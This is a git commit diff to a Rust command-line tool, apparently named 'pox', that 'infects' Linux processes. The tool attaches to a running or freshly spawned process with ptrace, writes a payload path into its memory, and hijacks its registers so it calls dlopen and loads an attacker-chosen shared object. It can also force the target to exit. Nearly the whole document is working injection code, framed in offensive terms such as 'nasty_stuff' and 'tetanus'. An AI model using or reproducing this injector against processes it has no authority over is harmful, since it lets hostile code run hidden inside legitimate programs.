feat: allow to spawn and then infect processes
This commit is contained in:
parent
e5d55984d0
commit
4546d6b0fe
1 changed files with 53 additions and 20 deletions
|
@ -1,9 +1,9 @@
|
||||||
use std::path::PathBuf;
|
use std::{path::PathBuf, process::Command};
|
||||||
|
|
||||||
use tracing::{metadata::LevelFilter, info, error};
|
use tracing::{metadata::LevelFilter, info, error};
|
||||||
|
|
||||||
use nix::{sys::{ptrace, wait::waitpid}, unistd::Pid};
|
use nix::{sys::{ptrace, wait::waitpid}, unistd::Pid};
|
||||||
use clap::Parser;
|
use clap::{Parser, Subcommand};
|
||||||
|
|
||||||
use pox::locators::{procmaps::map_addr_path, exec::offset_in_elf};
|
use pox::locators::{procmaps::map_addr_path, exec::offset_in_elf};
|
||||||
use pox::rc::{
|
use pox::rc::{
|
||||||
|
@ -15,14 +15,13 @@ use pox::monitor::listen_logs;
|
||||||
|
|
||||||
#[derive(Parser, Debug)]
|
#[derive(Parser, Debug)]
|
||||||
#[command(author, version, about, long_about = None)]
|
#[command(author, version, about, long_about = None)]
|
||||||
struct NeedleArgs {
|
struct VectorArgs {
|
||||||
/// target process pid
|
|
||||||
pid: i32,
|
|
||||||
|
|
||||||
/// shared object to inject into target process
|
/// shared object to inject into target process
|
||||||
#[arg(short, long)]
|
|
||||||
payload: String,
|
payload: String,
|
||||||
|
|
||||||
|
#[clap(subcommand)]
|
||||||
|
target: TargetProcess,
|
||||||
|
|
||||||
/// exact address of dlopen function, calculated with `base + offset` if not given
|
/// exact address of dlopen function, calculated with `base + offset` if not given
|
||||||
#[arg(long)]
|
#[arg(long)]
|
||||||
addr: Option<usize>,
|
addr: Option<usize>,
|
||||||
|
@ -48,12 +47,46 @@ struct NeedleArgs {
|
||||||
monitor: bool,
|
monitor: bool,
|
||||||
}
|
}
|
||||||
|
|
||||||
fn nasty_stuff(args: NeedleArgs) -> Result<(), Box<dyn std::error::Error>> {
|
#[derive(Subcommand, Clone, Debug)]
|
||||||
let pid = Pid::from_raw(args.pid);
|
enum TargetProcess {
|
||||||
|
/// Target a running process specifying its pid
|
||||||
|
Pid {
|
||||||
|
/// target pid
|
||||||
|
pid: i32
|
||||||
|
},
|
||||||
|
|
||||||
|
/// Target a new process by spawning it
|
||||||
|
Spawn {
|
||||||
|
/// path to spawn process from
|
||||||
|
path: String,
|
||||||
|
|
||||||
|
/// optional process arguments
|
||||||
|
#[arg(long, short)]
|
||||||
|
args: Option<Vec<String>>,
|
||||||
|
|
||||||
|
/// how long in ms to wait for child process to setup
|
||||||
|
#[arg(long, short, default_value_t = 1000)]
|
||||||
|
delay: u32,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
fn nasty_stuff(args: &VectorArgs) -> Result<(), Box<dyn std::error::Error>> {
|
||||||
|
let pid = match &args.target {
|
||||||
|
TargetProcess::Pid { pid } => Pid::from_raw(*pid),
|
||||||
|
TargetProcess::Spawn { path, args, delay } => {
|
||||||
|
let child = Command::new(path)
|
||||||
|
.args(args.as_ref().unwrap_or(&vec![]))
|
||||||
|
.spawn()?;
|
||||||
|
|
||||||
|
std::thread::sleep(std::time::Duration::from_millis(*delay as u64));
|
||||||
|
|
||||||
|
Pid::from_raw(child.id() as i32)
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
ptrace::attach(pid)?;
|
ptrace::attach(pid)?;
|
||||||
waitpid(pid, None)?;
|
waitpid(pid, None)?;
|
||||||
info!("attached to process #{}", args.pid);
|
info!("attached to process #{}", pid);
|
||||||
|
|
||||||
// continue running process step-by-step until we find a syscall
|
// continue running process step-by-step until we find a syscall
|
||||||
let syscall = step_to_syscall(pid)?; // TODO no real need to step...
|
let syscall = step_to_syscall(pid)?; // TODO no real need to step...
|
||||||
|
@ -61,12 +94,12 @@ fn nasty_stuff(args: NeedleArgs) -> Result<(), Box<dyn std::error::Error>> {
|
||||||
|
|
||||||
if args.kill {
|
if args.kill {
|
||||||
RemoteExit::args(69).exit(pid, syscall)?;
|
RemoteExit::args(69).exit(pid, syscall)?;
|
||||||
info!("killed process #{}", args.pid);
|
info!("killed process #{}", pid);
|
||||||
return Ok(());
|
return Ok(());
|
||||||
}
|
}
|
||||||
|
|
||||||
// move path to our payload into target address space
|
// move path to our payload into target address space
|
||||||
let tetanus = RemoteString::new(args.payload.clone() + "\0")
|
let payload = RemoteString::new(args.payload.clone() + "\0")
|
||||||
.inject(pid, syscall)?;
|
.inject(pid, syscall)?;
|
||||||
|
|
||||||
// find dlopen address
|
// find dlopen address
|
||||||
|
@ -87,14 +120,14 @@ fn nasty_stuff(args: NeedleArgs) -> Result<(), Box<dyn std::error::Error>> {
|
||||||
None => calc_base,
|
None => calc_base,
|
||||||
};
|
};
|
||||||
|
|
||||||
let fpath = match args.path {
|
let fpath = match &args.path {
|
||||||
Some(p) => p,
|
Some(p) => p,
|
||||||
None => calc_fpath,
|
None => &calc_fpath,
|
||||||
};
|
};
|
||||||
|
|
||||||
let offset = match args.offset {
|
let offset = match args.offset {
|
||||||
Some(o) => o, // TODO catch error if dlopen is not in symbols
|
Some(o) => o, // TODO catch error if dlopen is not in symbols
|
||||||
None => offset_in_elf(&fpath, "dlopen")?.expect("no dlopen symbol available"),
|
None => offset_in_elf(fpath, "dlopen")?.expect("no dlopen symbol available"),
|
||||||
};
|
};
|
||||||
|
|
||||||
dlopen_addr = base + offset;
|
dlopen_addr = base + offset;
|
||||||
|
@ -117,7 +150,7 @@ fn nasty_stuff(args: NeedleArgs) -> Result<(), Box<dyn std::error::Error>> {
|
||||||
// intercept our mock CALL and redirect it to dlopen real address (also fill args)
|
// intercept our mock CALL and redirect it to dlopen real address (also fill args)
|
||||||
let mut regs = ptrace::getregs(pid)?;
|
let mut regs = ptrace::getregs(pid)?;
|
||||||
regs.rip = dlopen_addr as u64;
|
regs.rip = dlopen_addr as u64;
|
||||||
regs.rdi = tetanus;
|
regs.rdi = payload;
|
||||||
regs.rsi = 0x1;
|
regs.rsi = 0x1;
|
||||||
ptrace::setregs(pid, regs)?;
|
ptrace::setregs(pid, regs)?;
|
||||||
ptrace::cont(pid, None)?;
|
ptrace::cont(pid, None)?;
|
||||||
|
@ -128,7 +161,7 @@ fn nasty_stuff(args: NeedleArgs) -> Result<(), Box<dyn std::error::Error>> {
|
||||||
// TODO clean allocated areas
|
// TODO clean allocated areas
|
||||||
ptrace::setregs(pid, original_regs)?;
|
ptrace::setregs(pid, original_regs)?;
|
||||||
ptrace::detach(pid, None)?;
|
ptrace::detach(pid, None)?;
|
||||||
info!("released process #{}", args.pid);
|
info!("released process #{}", pid);
|
||||||
|
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
@ -138,11 +171,11 @@ fn main() {
|
||||||
.with_max_level(LevelFilter::INFO)
|
.with_max_level(LevelFilter::INFO)
|
||||||
.init();
|
.init();
|
||||||
|
|
||||||
let args = NeedleArgs::parse();
|
let args = VectorArgs::parse();
|
||||||
|
|
||||||
let monitor = args.monitor;
|
let monitor = args.monitor;
|
||||||
|
|
||||||
if let Err(e) = nasty_stuff(args) {
|
if let Err(e) = nasty_stuff(&args) {
|
||||||
error!("error injecting shared object: {}", e);
|
error!("error injecting shared object: {}", e);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in a new issue